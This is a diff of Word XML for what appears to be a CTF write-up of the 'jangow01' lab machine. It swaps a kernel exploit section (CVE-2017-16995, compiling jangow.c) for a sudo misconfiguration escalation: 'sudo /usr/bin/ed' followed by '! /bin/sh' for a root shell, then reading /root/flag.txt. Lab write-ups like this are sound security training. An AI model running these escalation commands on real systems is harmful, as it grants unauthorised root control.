+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="36"/>
+          <w:sz w:val="48"/>
+          <w:szCs w:val="48"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Exploiting Sudo Misconfiguration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> editor was executed with sudo privileges.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8634,7 +8815,35 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Linux jangow01 4.4.0-31-generic</w:t>
+        <w:t>sudo /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>/bin/ed</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8654,187 +8863,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve">This kernel version is vulnerable to several </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>local privilege escalation exploits</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CBDFC19" wp14:editId="2B5449CC">
-            <wp:extent cx="5731510" cy="4895215"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
-            <wp:docPr id="530926329" name="Picture 41"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="530926329" name="Picture 530926329"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId19">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="4895215"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Searching for Exploits</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Exploit-DB was used to search for vulnerabilities related to this kernel version.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Relevant exploit identified:</w:t>
+        <w:t>Inside the editor, a shell was spawned:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8880,7 +8909,82 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Linux Kernel &lt; 4.4.0-116</w:t>
+        <w:t>! /bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This provided </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>root access</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Verification:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8926,7 +9030,27 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Local Privilege Escalation</w:t>
+        <w:t>whoami</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Output:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8972,7 +9096,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>CVE-2017-16995</w:t>
+        <w:t>root</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8987,16 +9111,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47635E7B" wp14:editId="32B5C510">
-            <wp:extent cx="5731510" cy="3000375"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="332778786" name="Picture 42"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D8389BC" wp14:editId="50693864">
+            <wp:extent cx="5731510" cy="1272540"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
+            <wp:docPr id="840029050" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -9004,17 +9125,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="332778786" name="Picture 332778786"/>
+                    <pic:cNvPr id="840029050" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20" cstate="print">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9022,7 +9137,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="3000375"/>
+                      <a:ext cx="5731510" cy="1272540"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -9041,18 +9156,6 @@
         <w:outlineLvl w:val="0"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
@@ -9075,7 +9178,8 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Exploiting the Kernel Vulnerability</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Retrieving the Root Flag</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9095,7 +9199,27 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>An exploit file named:</w:t>
+        <w:t>After gaining root privileges, the root directory was accessed.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9141,7 +9265,21 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>jangow.c</w:t>
+        <w:t>cd /root</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>ls</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9161,88 +9299,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>was compiled and executed.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:noProof/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64A12095" wp14:editId="43D976FE">
-            <wp:extent cx="5731510" cy="4895215"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
-            <wp:docPr id="58496374" name="Picture 44"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="58496374" name="Picture 58496374"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId21">
-                      <a:extLst>
-                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-                        </a:ext>
-                      </a:extLst>
-                    </a:blip>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="4895215"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Commands used:</w:t>
+        <w:t>A file named:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9288,7 +9345,47 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>gcc jangow.c -o jangow</w:t>
+        <w:t>flag.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>was discovered.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9334,7 +9431,27 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>chmod +x jangow</w:t>
+        <w:t>cat flag.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
